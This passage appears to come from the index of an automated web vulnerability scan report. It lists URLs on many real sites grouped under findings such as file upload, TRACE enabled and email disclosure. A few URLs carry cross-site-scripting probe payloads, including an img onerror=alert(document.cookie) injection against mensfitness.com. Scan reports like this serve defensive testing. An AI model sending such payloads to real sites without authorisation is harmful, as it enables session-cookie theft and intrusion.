18.516. http://www.ehow.com/topic_227_take-pictures.html

18.517. http://www.ehow.com/topic_2488_lose-weight.html

18.518. http://www.ehow.com/topic_253_lose-weight-now.html

18.519. http://www.ehow.com/topic_3493_lose-weight-dieting.html

18.520. http://www.ehow.com/topic_363_winter-sports.html

18.521. http://www.ehow.com/topic_3818_flu-guide.html

18.522. http://www.ehow.com/topic_3990_home-security-systems-guide.html

18.523. http://www.ehow.com/topic_401_home-alarms.html

18.524. http://www.ehow.com/topic_4028_preparing-flu-season.html

18.525. http://www.ehow.com/topic_4127_home-alarm-system-guide.html

18.526. http://www.ehow.com/topic_429_all-flu.html

18.527. http://www.ehow.com/topic_4989_photo-sharing-101.html

18.528. http://www.ehow.com/topic_49_treating-colds-flus.html

18.529. http://www.ehow.com/topic_5023_jog-lose-weight.html

18.530. http://www.ehow.com/topic_689_black-white-photos.html

18.531. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html

18.532. http://www.ehow.com/topic_7853_floor-fountains-guide.html

18.533. http://www.ehow.com/topic_7992_floor-water-fountains-101.html

18.534. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html

18.535. http://www.ehow.com/topic_8047_water-garden-fountains-101.html

18.536. http://www.ehow.com/toys-and-games/

18.537. http://www.ehow.com/unavailable.aspx

18.538. http://www.ehow.com/us-travel/

18.539. http://www.ehow.com/vacations-and-travel-planning/

18.540. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html

18.541. http://www.ehow.com/video_6976779_sensational-snacks.html

18.542. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html

18.543. http://www.ehow.com/videos.html

18.544. http://www.ehow.com/weddings-and-parties/

18.545. http://www.ehow.com/weight-management-and-body-image/

18.546. http://www.ehow.com/winterize-a-garden/

18.547. http://www.ehow.com/xd_receiver.htm

18.548. https://www.ehow.com/account/simple_login.aspx

18.549. https://www.ehow.com/account/simple_register.aspx

18.550. https://www.ehow.com/content/compressed/en-US/common-kvgh0g.css

18.551. https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css

18.552. https://www.ehow.com/forms/

18.553. https://www.ehow.com/forms/PasswordRetrieval.aspx

18.554. https://www.ehow.com/forms/signin.aspx

18.555. https://www.ehow.com/js/gasp.js

18.556. https://www.ehow.com/js/i2a.js

18.557. https://www.ehow.com/privacy.aspx

18.558. https://www.ehow.com/terms_use.aspx

18.559. https://www.ehow.com/xd_receiver.htm

18.560. http://www.elib.org/articles/

18.561. http://www.elib.org/articles/category/wordpress/

18.562. http://www.everydaylifestyles.com/articles3.php

18.563. http://www.evow.com/

18.564. http://www.exploit-db.com/exploits/15313/

18.565. http://www.f-secure.com/weblog/archives/00001972.html

18.566. http://www.facebook.com/

18.567. http://www.facebook.com/

18.568. http://www.facebook.com/%s

18.569. http://www.facebook.com/2008/fbml

18.570. http://www.facebook.com/MillenniumHotels

18.571. http://www.facebook.com/ajax/intl/language_dialog.php

18.572. http://www.facebook.com/btaylor

18.573. http://www.facebook.com/careers/

18.574. http://www.facebook.com/directory/pages/

18.575. http://www.facebook.com/directory/people/

18.576. http://www.facebook.com/facebook

18.577. http://www.facebook.com/help/

18.578. http://www.facebook.com/ligatt

18.579. http://www.facebook.com/platform

18.580. http://www.facebook.com/plugins/activity.php

18.581. http://www.facebook.com/plugins/activity.php

18.582. http://www.facebook.com/plugins/facepile.php

18.583. http://www.facebook.com/plugins/facepile.php

18.584. http://www.facebook.com/plugins/like.php

18.585. http://www.facebook.com/plugins/like.php

18.586. http://www.facebook.com/policy.php

18.587. http://www.facebook.com/privacy/explanation.php

18.588. http://www.facebook.com/r.php

18.589. http://www.facebook.com/r.php

18.590. http://www.facebook.com/terms.php

18.591. http://www.google.com/accounts/TOS

18.592. http://www.google.com/ig/adde

18.593. http://www.google.com/intl/en/options/

18.594. http://www.google.com/support/chrome/bin/answer.py

18.595. http://www.google.com/support/websearch/bin/answer.py

18.596. http://www.google.com/uds/solutions/localsearch/gmlocalsearch.js

18.597. http://www.gorp.com/

18.598. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

18.599. http://www.huddletogether.com/projects/lightbox2/

18.600. http://www.huffingtonpost.com/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html

18.601. http://www.invisionpower.com/index.php

18.602. http://www.iphoneez.com/

18.603. http://www.ispad.info/

18.604. http://www.kampyle.com/

18.605. http://www.ligattsecurity.com/

18.606. http://www.ligattsecurity.com/:nolink

18.607. http://www.ligattsecurity.com/about-us

18.608. http://www.ligattsecurity.com/commercials

18.609. http://www.ligattsecurity.com/font.swf

18.610. http://www.ligattsecurity.com/ligatt-security/wp-admin

18.611. http://www.ligattsecurity.com/solutions

18.612. http://www.ligattsecurity.com/solutions/am-i-hacker-proof

18.613. http://www.ligattsecurity.com/solutions/boobytrap

18.614. http://www.ligattsecurity.com/solutions/hacker-in-15-minutes

18.615. http://www.ligattsecurity.com/wp-content/themes/elite-force/favicon.ico

18.616. http://www.livestrong.com/

18.617. http://www.loansendorsed.com/

18.618. http://www.lodging.com/

18.619. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136

18.620. http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a

18.621. http://www.mensfitness.com/sports_and_recreation/outdoor_recreation/55

18.622. http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html

18.623. http://www.millenniumhotels.co.nz/copthornebayofislands/index.html

18.624. http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html

18.625. http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html

18.626. http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html

18.627. http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html

18.628. http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html

18.629. http://www.millenniumhotels.co.nz/copthornehokianga/index.html

18.630. http://www.millenniumhotels.co.nz/copthornemarlborough/index.html

18.631. http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html

18.632. http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html

18.633. http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html

18.634. http://www.millenniumhotels.co.nz/copthornewairarapa/index.html

18.635. http://www.millenniumhotels.co.nz/index.html

18.636. http://www.millenniumhotels.co.nz/kingsgateauckland/index.html

18.637. http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html

18.638. http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html

18.639. http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html

18.640. http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html

18.641. http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html

18.642. http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html

18.643. http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html

18.644. http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html

18.645. http://www.millenniumhotels.co.nz/kingsgateteanau/index.html

18.646. http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html

18.647. http://www.millenniumhotels.co.nz/kingsgatewellington/index.html

18.648. http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html

18.649. http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html

18.650. http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html

18.651. http://www.millenniumhotels.co.nz/millenniumrotorua/index.html

18.652. http://www.millenniumhotels.co.nz/millenniumtaupo/index.html

18.653. http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html

18.654. http://www.millenniumhotels.co.uk/copthornebirmingham/index.html

18.655. http://www.millenniumhotels.co.uk/copthornecardiff/index.html

18.656. http://www.millenniumhotels.co.uk/copthornedudley/index.html

18.657. http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html

18.658. http://www.millenniumhotels.co.uk/copthornegatwick/index.html

18.659. http://www.millenniumhotels.co.uk/copthornemanchester/index.html

18.660. http://www.millenniumhotels.co.uk/copthornenewcastle/index.html

18.661. http://www.millenniumhotels.co.uk/copthorneplymouth/index.html

18.662. http://www.millenniumhotels.co.uk/copthornereading/index.html

18.663. http://www.millenniumhotels.co.uk/copthornesheffield/index.html

18.664. http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html

18.665. http://www.millenniumhotels.co.uk/copthornetarakensington/index.html

18.666. http://www.millenniumhotels.co.uk/index.html

18.667. http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html

18.668. http://www.millenniumhotels.co.uk/millenniumglasgow/index.html

18.669. http://www.millenniumhotels.co.uk/millenniumgloucester/index.html

18.670. http://www.millenniumhotels.co.uk/millenniumkensington/index.html

18.671. http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html

18.672. http://www.millenniumhotels.co.uk/millenniummayfair/index.html

18.673. http://www.millenniumhotels.co.uk/millenniumreading/index.html

18.674. http://www.millenniumhotels.com/

18.675. http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html

18.676. http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html

18.677. http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html

18.678. http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html

18.679. http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html

18.680. http://www.millenniumhotels.com/ae/millenniumdubai/index.html

18.681. http://www.millenniumhotels.com/cn/copthorneqingdao/index.html

18.682. http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html

18.683. http://www.millenniumhotels.com/cn/millenniumchengdu/index.html

18.684. http://www.millenniumhotels.com/cn/millenniumshanghai/index.html

18.685. http://www.millenniumhotels.com/cn/millenniumwuxi/index.html

18.686. http://www.millenniumhotels.com/cn/millenniumxiamen/index.html

18.687. http://www.millenniumhotels.com/corporate/contact_us/enquiriesReservation.html

18.688. http://www.millenniumhotels.com/corporate/faq/faq.html

18.689. http://www.millenniumhotels.com/corporate/hotels/copthorneHotels.html

18.690. http://www.millenniumhotels.com/corporate/hotels/hotelsMillennium.html

18.691. http://www.millenniumhotels.com/corporate/index.html

18.692. http://www.millenniumhotels.com/corporate/investor_relations/financialLibrary.html

18.693. http://www.millenniumhotels.com/corporate/legalInfo.html

18.694. http://www.millenniumhotels.com/corporate/privacyPolicy.html

18.695. http://www.millenniumhotels.com/corporate/siteMap.html

18.696. http://www.millenniumhotels.com/corporate/termsConditions.html

18.697. http://www.millenniumhotels.com/de/copthornehannover/index.html

18.698. http://www.millenniumhotels.com/de/millenniumstuttgart/index.html

18.699. http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html

18.700. http://www.millenniumhotels.com/fr/millenniumparis/index.html

18.701. http://www.millenniumhotels.com/id/millenniumjakarta/index.html

18.702. http://www.millenniumhotels.com/index.html

18.703. http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html

18.704. http://www.millenniumhotels.com/millenniumanchorage/index.html

18.705. http://www.millenniumhotels.com/millenniumboston/attractions/

18.706. http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html

18.707. http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html

18.708. http://www.millenniumhotels.com/millenniumboston/attractions/index.html

18.709. http://www.millenniumhotels.com/millenniumboston/contactus/index.html

18.710. http://www.millenniumhotels.com/millenniumboston/facilities/

18.711. http://www.millenniumhotels.com/millenniumboston/facilities/index.html

18.712. http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html

18.713. http://www.millenniumhotels.com/millenniumboston/gallery/index.html

18.714. http://www.millenniumhotels.com/millenniumboston/index.html

18.715. http://www.millenniumhotels.com/millenniumboston/meeting/index.html

18.716. http://www.millenniumhotels.com/millenniumboston/news/index.html

18.717. http://www.millenniumhotels.com/millenniumboston/restaurant/

18.718. http://www.millenniumhotels.com/millenniumboston/restaurant/index.html

18.719. http://www.millenniumhotels.com/millenniumboston/rooms/

18.720. http://www.millenniumhotels.com/millenniumboston/rooms/index.html

18.721. http://www.millenniumhotels.com/millenniumboston/rooms/suite.html

18.722. http://www.millenniumhotels.com/millenniumboston/specials/index.html

18.723. http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html

18.724. http://www.millenniumhotels.com/millenniumboulder/index.html

18.725. http://www.millenniumhotels.com/millenniumbuffalo/index.html

18.726. http://www.millenniumhotels.com/millenniumchicago/index.html

18.727. http://www.millenniumhotels.com/millenniumcincinnati/index.html

18.728. http://www.millenniumhotels.com/millenniumdurham/index.html

18.729. http://www.millenniumhotels.com/millenniumlosangeles/index.html

18.730. http://www.millenniumhotels.com/millenniumminneapolis/index.html

18.731. http://www.millenniumhotels.com/millenniumnashville/index.html

18.732. http://www.millenniumhotels.com/millenniumnewyork/index.html

18.733. http://www.millenniumhotels.com/millenniumscottsdale/index.html

18.734. http://www.millenniumhotels.com/millenniumstlouis/index.html

18.735. http://www.millenniumhotels.com/millenniumunplazanewyork/index.html

18.736. http://www.millenniumhotels.com/my/copthornepenang/index.html

18.737. http://www.millenniumhotels.com/my/millenniumkualalumpur/index.html

18.738. http://www.millenniumhotels.com/opening/millenniumveetaichung.html

18.739. http://www.millenniumhotels.com/ph/heritagemanila/index.html

18.740. http://www.millenniumhotels.com/premierhotelnewyork/index.html

18.741. http://www.millenniumhotels.com/qa/millenniumdoha/index.html

18.742. http://www.millenniumhotels.com/th/grandmillenniumsukhumvitbangkok/index.html

18.743. http://www.millenniumhotels.com/th/millenniumpatongphuket/index.html

18.744. http://www.millenniumhotels.com.cn/

18.745. http://www.millenniumhotels.com.sg/

18.746. http://www.millenniumhotels.com.sg/StudioMHotel/index.html

18.747. http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html

18.748. http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html

18.749. http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html

18.750. http://www.millenniumhotels.com.sg/mhotelsingapore/index.html

18.751. http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html

18.752. http://www.montanaplates.com/

18.753. http://www.montanaplates.com/747natoma.html

18.754. http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html

18.755. http://www.montanaplates.com/index-2.html

18.756. http://www.montanaplates.com/onlineshoppingempire.html

18.757. http://www.montanaplates.com/privacy.html

18.758. http://www.msn.com/

18.759. http://www.msn.com/defaultwpe7.aspx

18.760. http://www.msn.com/sck.aspx

18.761. http://www.msn.com/worldwide.aspx

18.762. http://www.msnbc.msn.com/

18.763. http://www.msnbc.msn.com/id/3032072/ns/business

18.764. http://www.msnbc.msn.com/id/3032076/ns/health

18.765. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science

18.766. http://www.msnbc.msn.com/id/3032507/ns/world_news

18.767. http://www.msnbc.msn.com/id/3032525/ns/us_news

18.768. http://www.msnbc.msn.com/id/3032553/ns/politics

18.769. http://www.msnbc.msn.com/id/3032619/ns/nightly_news/

18.770. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/

18.771. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/

18.772. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar

18.773. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/

18.774. http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting

18.775. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/

18.776. http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts

18.777. http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/

18.778. http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/

18.779. http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/

18.780. http://www.msnbc.msn.com/id/41363738/ns/weather

18.781. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/

18.782. http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times

18.783. http://www.msnbc.msn.com/id/41365053

18.784. http://www.msnbc.msn.com/id/41365053/ns/weather/

18.785. http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa

18.786. http://www.msnbc.msn.com/id/41367374/ns/world_news-europe

18.787. http://www.mygadgetsblog.info/

18.788. http://www.mywot.com/en/scorecard/2mdn.net

18.789. http://www.no-margin-for-errors.com/

18.790. http://www.nolanfans.com/

18.791. http://www.opensource.org/licenses/gpl-license.php

18.792. http://www.opensource.org/licenses/mit-license.php

18.793. http://www.orbitz.com/

18.794. http://www.orbitz.com/

18.795. http://www.orbitz.com/

18.796. http://www.orbitz.com/App/DPTLandingPageSearch

18.797. http://www.orbitz.com/App/DisplayCarSearch

18.798. http://www.orbitz.com/App/DisplayCarSearch

18.799. http://www.orbitz.com/App/GDDC

18.800. http://www.orbitz.com/App/GDDC

18.801. http://www.orbitz.com/App/Home

18.802. http://www.orbitz.com/App/Home

18.803. http://www.orbitz.com/App/InitDealEdit

18.804. http://www.orbitz.com/App/PerformMDLPDealsContent

18.805. http://www.orbitz.com/App/PerformMDLPDealsContent

18.806. http://www.orbitz.com/App/PerformMDLPDealsContent

18.807. http://www.orbitz.com/App/PerformMDLPDealsContent

18.808. http://www.orbitz.com/App/PerformMDLPDealsContent

18.809. http://www.orbitz.com/App/PerformMDLPDealsContent

18.810. http://www.orbitz.com/App/PerformMDLPDealsContent

18.811. http://www.orbitz.com/App/PerformMDLPDealsContent

18.812. http://www.orbitz.com/App/PerformMDLPDealsContent

18.813. http://www.orbitz.com/App/PerformMDLPDealsContent

18.814. http://www.orbitz.com/App/PrepareActivitiesHome

18.815. http://www.orbitz.com/App/PrepareDealsHome

18.816. http://www.orbitz.com/App/PrepareFlightsTab

18.817. http://www.orbitz.com/App/PrepareSearchResult

18.818. http://www.orbitz.com/App/PrepareVacationsHome

18.819. http://www.orbitz.com/App/Sitemap

18.820. http://www.orbitz.com/App/SubmitQuickSearch

18.821. http://www.orbitz.com/App/ViewRSSHelpPage

18.822. http://www.orbitz.com/App/ViewRSSHelpPage

18.823. http://www.orbitz.com/App/ViewRoundTripSearch

18.824. http://www.orbitz.com/App/ViewRoundTripSearch

18.825. http://www.orbitz.com/App/ViewRoundTripSearch

18.826. http://www.orbitz.com/hotels/

18.827. http://www.orbitz.com/hotels/Canada--ON/Toronto/

18.828. http://www.orbitz.com/hotels/France/Nice/

18.829. http://www.orbitz.com/hotels/France/Paris/

18.830. http://www.orbitz.com/hotels/Mexico/

18.831. http://www.orbitz.com/hotels/Mexico/Cancun/

18.832. http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/

18.833. http://www.orbitz.com/hotels/United_Kingdom/London/

18.834. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/

18.835. http://www.orbitz.com/hotels/United_States--CA/San_Diego/

18.836. http://www.orbitz.com/hotels/United_States--CA/San_Francisco/

18.837. http://www.orbitz.com/hotels/United_States--FL/Miami/

18.838. http://www.orbitz.com/hotels/United_States--FL/Orlando/

18.839. http://www.orbitz.com/hotels/United_States--IL/Chicago/

18.840. http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/

18.841. http://www.orbitz.com/hotels/United_States--NY/New_York/

18.842. http://www.orbitz.com/shop/hotelsearch

18.843. https://www.orbitz.com/Secure/SignIn

18.844. https://www.orbitz.com/account/login

18.845. https://www.orbitz.com/account/registration

18.846. https://www.orbitz.com/trips/writeReview

18.847. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting

18.848. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

18.849. http://www.oyster.com/boston/hotels/millennium-bostonian/

18.850. http://www.pctools.com/

18.851. http://www.pctools.com/firewall/

18.852. http://www.pctools.com/free-antivirus/

18.853. http://www.pctools.com/registry-mechanic/

18.854. http://www.pctools.com/spyware-doctor/

18.855. http://www.plentyoffish.com/

18.856. http://www.plentyoffish.com/basicsearch.aspx

18.857. http://www.plentyoffish.com/member1242943.htm

18.858. http://www.plentyoffish.com/member16373418.htm

18.859. http://www.plentyoffish.com/member19992238.htm

18.860. http://www.plentyoffish.com/member22529971.htm

18.861. http://www.plentyoffish.com/member22970699.htm

18.862. http://www.plentyoffish.com/member23010679.htm

18.863. http://www.plentyoffish.com/member23031204.htm

18.864. http://www.plentyoffish.com/member23817184.htm

18.865. http://www.plentyoffish.com/member24663198.htm

18.866. http://www.plentyoffish.com/member24778333.htm

18.867. http://www.plentyoffish.com/member25294614.htm

18.868. http://www.plentyoffish.com/member25300504.htm

18.869. http://www.plentyoffish.com/member25401489.htm

18.870. http://www.plentyoffish.com/member25429166.htm

18.871. http://www.plentyoffish.com/register.aspx

18.872. http://www.plentyoffish.com/suggestions_v2.aspx

18.873. http://www.plentyoffish.com/terms.aspx

18.874. http://www.ppcse.net/

18.875. http://www.proxyhelp.net/

18.876. http://www.ratedesi.com/

18.877. http://www.revresda.com/html.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US

18.878. http://www.revresda.com/html.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US

18.879. http://www.robtex.com/as/as36621.html

18.880. http://www.robtex.com/dns/

18.881. http://www.robtex.com/dns/google.com.html

18.882. http://www.robtex.com/dns/net.html

18.883. http://www.robtex.com/dns/ns1.google.com.html

18.884. http://www.robtex.com/ext/ads/nb728.html

18.885. http://www.robtex.com/ext/ads/nt728.html

18.886. http://www.robtex.com/faq.html

18.887. http://www.scmagazineus.com/search/xss/

18.888. http://www.shape.com/workouts/articles/blood_sugar.html

18.889. http://www.shape.com/workouts/articles/workout_schedule.html

18.890. http://www.stocktrader.org.uk/remote2/ST1-2.php

18.891. http://www.stocktrader.org.uk/widgets/stock-trader-scroller-1.html

18.892. http://www.techmynd.com/cross-site-scripting-attacks-xss/

18.893. http://www.thefreedomtrail.org/

18.894. http://www.theroot.com/multimedia/50-years-black-history

18.895. http://www.theroot.com/views/2011/young-futurists

18.896. http://www.theroot.com/views/meet-25-people-who-will-change-our-world

18.897. http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/

18.898. http://www.theworkbuzz.com/employment-trends/video-interviews/

18.899. http://www.threatexpert.com/

18.900. http://www.threatexpert.com/azlisting.aspx

18.901. http://www.threatexpert.com/catlisting.aspx

18.902. http://www.threatexpert.com/contact.aspx

18.903. http://www.threatexpert.com/default.aspx

18.904. http://www.threatexpert.com/files/a.exe.html

18.905. http://www.threatexpert.com/files/b.exe.html

18.906. http://www.threatexpert.com/files/c.exe.html

18.907. http://www.threatexpert.com/files/msa.exe.html

18.908. http://www.threatexpert.com/files/msxml71.dll.html

18.909. http://www.threatexpert.com/filescan.aspx

18.910. http://www.threatexpert.com/introduction.aspx

18.911. http://www.threatexpert.com/map.aspx

18.912. http://www.threatexpert.com/memoryscanner.aspx

18.913. http://www.threatexpert.com/overview.aspx

18.914. http://www.threatexpert.com/report.aspx

18.915. http://www.threatexpert.com/reports.aspx

18.916. http://www.threatexpert.com/sescan.aspx

18.917. http://www.threatexpert.com/signin.aspx

18.918. http://www.threatexpert.com/signup.aspx

18.919. http://www.threatexpert.com/submissionapplet.aspx

18.920. http://www.threatexpert.com/submit.aspx

18.921. http://www.threatexpert.com/threats.aspx

18.922. http://www.threatexpert.com/threats/adware-bho-gen.html

18.923. http://www.threatexpert.com/threats/trojan-fakealert.html

18.924. http://www.trip.com/

18.925. http://www.ufc.com/

18.926. http://www.unitware.com/

18.927. http://www.veracode.com/security/xss

18.928. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

18.929. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

18.930. http://www.webveteran.com/

18.931. http://www.wirelessmicrophone.info/

18.932. http://www.wirelessprinter.info/

18.933. http://www.wizzsurf.com/

18.934. http://www.worldmastiffforum.com/

18.935. http://www.xss.com/

18.936. http://www.xssed.com/

19. File upload functionality

19.1. http://translate.google.com/translate_t

19.2. http://www.sitesearch.omniture.com/contact/form_support.htm

19.3. http://www.threatexpert.com/filescan.aspx

19.4. http://www.threatexpert.com/submit.aspx

20. TRACE method is enabled

20.1. http://www.astaro.com/

20.2. https://www.astaro.com/

21. Email addresses disclosed

21.1. http://a.cdn.intentmedia.net/javascripts/intent_media_orbitz_ads_fif.js

21.2. http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js

21.3. https://admin.testandtarget.omniture.com/a

21.4. https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp

21.5. http://ads.adbrite.com/adserver/vdi/762701

21.6. http://ads.adbrite.com/adserver/vdi/762701

21.7. http://ads.adbrite.com/adserver/vdi/762701

21.8. http://ads.adbrite.com/adserver/vdi/762701

21.9. http://ads.adbrite.com/adserver/vdi/762701

21.10. http://ads.adbrite.com/adserver/vdi/762701

21.11. http://ads.adbrite.com/adserver/vdi/762701

21.12. http://ads.adbrite.com/adserver/vdi/762701

21.13. http://ads.adbrite.com/adserver/vdi/762701

21.14. http://ads.adbrite.com/adserver/vdi/762701

21.15. http://ads.adbrite.com/adserver/vdi/762701

21.16. http://ads.adbrite.com/adserver/vdi/762701

21.17. https://ads.pof.com/

21.18. https://ads.pof.com/Default.aspx

21.19. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)

21.20. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png

21.21. http://ads1.msn.com/library/dap.js

21.22. http://ads1.msn.com/library/dapbeta.js

21.23. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/controls.js

21.24. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/dragdrop.js

21.25. http://blekko.com/s/images/wait24trans.gif

21.26. http://blekko.com/s/theme19/imgs/plugs/likes_popup2.png

21.27. http://blekko.com/s/theme19/imgs/plugs/mobileapp.png

21.28. http://blekko.com/ws/

21.29. http://blekko.com/ws/+/about

21.30. http://blekko.com/ws/+/adsense=4433512740400217

21.31. http://blekko.com/ws/+/adsense=4433512740400217+/cwe-79

21.32. http://blekko.com/ws/+/adsense=6316080006029695+/cwe-79

21.33. http://blekko.com/ws/+/adsense=7542722322890062

21.34. http://blekko.com/ws/+/adsense=7542722322890062+/cwe-79

21.35. http://blekko.com/ws/+/adsense=7760089209341419

21.36. http://blekko.com/ws/+/adsense=7760089209341419+/cwe-79

21.37. http://blekko.com/ws/+/adsense=9396229490951644

21.38. http://blekko.com/ws/+/adsense=9396229490951644+/cwe-79

21.39. http://blekko.com/ws/+/blekkoapp

21.40. http://blekko.com/ws/+/blekkojobs

21.41. http://blekko.com/ws/+/contact

21.42. http://blekko.com/ws/+/faq

21.43. http://blekko.com/ws/+/help

21.44. http://blekko.com/ws/+/ip=128.83.114.63

21.45. http://blekko.com/ws/+/ip=128.83.114.63+/cwe-79

21.46. http://blekko.com/ws/+/ip=173.236.153.56

21.47. http://blekko.com/ws/+/ip=173.236.153.56+/cwe-79

21.48. http://blekko.com/ws/+/ip=174.136.98.194

21.49. http://blekko.com/ws/+/ip=174.136.98.194+/cwe-79

21.50. http://blekko.com/ws/+/ip=204.9.177.195

21.51. http://blekko.com/ws/+/ip=204.9.177.195+/cwe-79

21.52. http://blekko.com/ws/+/ip=207.46.19.254

21.53. http://blekko.com/ws/+/ip=207.46.19.254+/cwe-79

21.54. http://blekko.com/ws/+/ip=207.97.227.239

21.55. http://blekko.com/ws/+/ip=207.97.227.239+/cwe-79

21.56. http://blekko.com/ws/+/ip=208.80.152.2

21.57. http://blekko.com/ws/+/ip=208.80.152.2+/cwe-79

21.58. http://blekko.com/ws/+/ip=209.107.213.19

21.59. http://blekko.com/ws/+/ip=209.107.213.19+/cwe-79

21.60. http://blekko.com/ws/+/ip=216.34.181.96

21.61. http://blekko.com/ws/+/ip=216.34.181.96+/cwe-79

21.62. http://blekko.com/ws/+/ip=216.48.3.18

21.63. http://blekko.com/ws/+/ip=216.48.3.18+/cwe-79

21.64. http://blekko.com/ws/+/ip=64.15.79.182

21.65. http://blekko.com/ws/+/ip=64.15.79.182+/cwe-79

21.66. http://blekko.com/ws/+/ip=65.55.11.162

21.67. http://blekko.com/ws/+/ip=65.55.11.162+/cwe-79

21.68. http://blekko.com/ws/+/ip=71.41.152.29

21.69. http://blekko.com/ws/+/ip=71.41.152.29+/cwe-79

21.70. http://blekko.com/ws/+/ip=72.14.213.132

21.71. http://blekko.com/ws/+/ip=72.14.213.132+/cwe-79

21.72. http://blekko.com/ws/+/ip=72.32.187.73

21.73. http://blekko.com/ws/+/ip=72.32.187.73+/cwe-79

21.74. http://blekko.com/ws/+/ip=72.32.255.178

